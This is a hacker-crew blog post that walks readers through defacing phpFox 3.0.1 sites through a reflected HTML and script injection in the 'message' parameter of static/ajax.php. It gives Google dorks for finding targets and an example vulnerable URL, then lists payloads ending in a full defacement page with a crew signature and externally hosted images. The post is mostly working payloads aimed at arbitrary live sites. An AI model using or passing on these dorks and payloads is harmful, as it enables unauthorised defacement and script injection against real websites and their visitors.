Dork: "intext:© · English (US) Powered By phpFox Version 3.0.1."
"inurl:/static/ajax.php?core"
1- Choose any dork and paste on Google
2- Choose any site
Exploiting Target
1- So, your site would be like this or something similar,
www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">Error Message Here&core[security_token]=99d754d2b583565369e194e30eaabcbc
2- Now, change the error message with your HTML tags or anything you want.
To show Header
<h1>Hacked</h1>
To show header in center
<center><h1>Hacked</h1></center>
To show Title
<title>Hacked</title>
To Add a Image
<img src="http://www.black-cybersec-crew.blogspot.com'><img src="http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png"/>
To add a Message
<p><b>Your Message Here<b></p>
To write message in next lines
<p><b>First line<br>Second Line <b></p>
To add a scrolling Text
<marquee>Scrolling text Here</marquee>
To Add a alert box
<script>alert("hello");</script>
To add background colour in page
<body bgcolor="red"/>
To Add a full deface Page
<title>Hacked!</title><body bgcolor=black><center><font color="white"><h2>XSSed!</h2><br><h1>./BL4CK E4GL3 W4S H3RE</h1><a href='http://www.black-cybersec-crew.blogspot.com'><marquee><img src="http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png"/></marquee>
3- So it would be like this,
List
Live Demo:
DEMO
0 komentar:
Posting Komentar